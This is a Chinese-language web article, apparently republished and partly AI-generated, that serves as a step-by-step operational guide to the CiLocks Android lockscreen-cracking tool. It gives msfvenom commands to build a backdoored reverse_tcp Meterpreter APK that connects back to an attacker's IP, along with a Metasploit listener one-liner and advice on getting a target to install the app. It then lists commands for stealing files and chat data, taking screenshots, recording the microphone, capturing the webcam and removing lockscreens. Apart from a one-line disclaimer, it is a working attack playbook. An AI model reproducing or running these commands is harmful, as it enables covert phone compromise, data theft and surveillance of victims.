ARTICLE DETAIL

资讯详情

深耕网站视觉设计与运营推广的一线实战洞察。

CiLocks Meterpreter会话必备命令清单:从拿到Shell到执行操作的完整指南

CiLocks Meterpreter会话必备命令清单:从拿到Shell到执行操作的完整指南 CiLocks Meterpreter会话必备命令清单从拿到Shell到执行操作的完整指南【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocksCiLocks是一款集成 Metasploit 的 Android/IOS 锁屏破解工具支持 PIN 爆破、反锁屏绕过、ADB 工具箱以及一键启动reverse_tcp监听器。当你通过 CiLocks 拿到Meterpreter 会话后接下来该敲哪些命令本文整理了一份从拿到 Shell到执行操作的完整命令清单覆盖信息侦察、文件读写、会话管理与后渗透模块六大类新手照着敲即可上手。一、CiLocks 里 Meterpreter 会话是怎么来的CiLocks 的主脚本是 cilocks启动后进入主菜单选择10. Jump To Metasploit即可进入 Metasploit 子模块。运行前data/config 会自动检测系统是否安装了msfconsole缺失时会提示补装。整个流程被拆成 4 个功能菜单项作用关键命令1. Install Application通过 ADB 安装 APKadb installadb shell am start2. Create Payload Backdoor生成并签名的 Meterpreter 后门 APKmsfvenom -p android/meterpreter/reverse_tcp3. Run Metasploit启动监听器等待目标回连use exploit/multi/handler4. Inject Payload向已有 APK 注入 payloadmsfvenom --platform android -x后门文件统一输出到 backdoor/ 目录该目录内置了 wibu.apk 模板。二、三步拿到会话Payload → 后门APK → 回连第 1 步生成 payload。进入菜单 10 → 2输入 LHOST攻击机 IP与 LPORTCiLocks 会执行msfvenom -p android/meterpreter/reverse_tcp lhostIP lport端口 R backdoor/loli.apk随后自动用keytooljarsigner签名、zipalign对齐产物保存在backdoor/你起的名字.apk。第 2 步启动监听器。选择 10 → 3 → 1Multi Handler默认。CiLocks 会替你拼好一条自动化命令并在新终端执行msfconsole -x use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp ; set lhost IP ; set lport 端口; exploit第 3 步目标触发回连。让目标安装并运行后门 APK菜单 1 可自动adb install监听端出现Meterpreter session 1 opened即表示会话建立成功——本文剩余部分都在这条会话里进行。三、会话建立后的 Meterpreter 必备命令清单1. 侦察目标确认身份与设备信息命令作用getuid查看当前会话以哪个用户身份运行sysinfo查看设备型号、Android 版本、CPU 架构ps列出目标正在运行的进程pwd/cd查看/切换 Meterpreter 内部路径ifconfig查看 Meterpreter 会话的本地/远程 IP 与端口先跑这三条getuid、sysinfo、ps基本就能判断目标设备与权限层级。2. 会话管理多会话并行操作命令作用bg 1把 1 号会话转入后台jobs列出所有后台会话use 1切回 1 号会话foreground 1将指定会话拉回前台info查看当前会话详情kill 1关闭 1 号会话拿到多台目标时用bguse在多个meterpreter 之间切换不必逐个重连。3. 文件读写最实用的取数操作meterpreter ls /sdcard # 浏览目录 meterpreter cat /sdcard/notes.txt # 直接读取文本 meterpreter download /sdcard/a.jpg ./a.jpg # 拉取文件 meterpreter upload ./tool # 推送文件到目标 meterpreter mkdir /sdcard/tmp # 建目录拍照类应用的数据、聊天记录文件基本都在/sdcard下lsdownload是最高频的组合。4. 截屏与录音可视化取证命令说明screenshot /sdcard/shot.png截屏并写入目标存储再download取回record-mic ./rec.wav录音部分 ROM 无音频权限时会失败webcam_snapshot /sdcard/w.jpg部分设备支持远程拍摄像头Android 上最稳定的取证手段是screenshotdownload二连。5. 进程迁移让会话更稳migrate PID可把 Meterpreter 迁移到指定进程如系统级进程中运行降低被应用管理器杀掉的概率ps找到 PIDkill则结束指定进程。6. 后渗透模块一键移除锁屏CiLocks 把最常用的后渗透模块做成了快捷入口菜单 10 → 3 → 2/3直接绑定以下两个模块并自动填充 payload 参数post/android/manage/remove_lock—— 普通版移除锁屏post/android/manage/remove_lock_root—— Root 版移除锁屏在已建立的会话里也可以手动执行meterpreter run post/android/manage/remove_lock配合仓库中的 AntiGuard/src/io/kos/antiguard/unlock.java菜单 5 的反锁屏绕过应用CiLocks 覆盖了无 Root 爆破 → Root 移除 → 会话内移除的完整锁屏处理链路。四、常见问题与注意事项 ⚠️会话连不上reverse_tcp要求目标能主动回连攻击机请确认 LHOST 是目标可达的局域网 IP且防火墙放行了 LPORT。环境依赖需提前安装 ADB 与msfconsolesudo apt install msfconsole运行脚本需 root 权限sudo bash cilocks。仅限合法用途所有操作请只在自己拥有或已获书面授权的设备上进行仓库 README 中也有明确声明。掌握上面这份清单你就能从 CiLocks 建立的 Meterpreter 会话出发完成侦察 → 取数 → 稳定会话 → 后渗透的完整闭环命令不多但覆盖了日常 90% 的场景。【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
返回列表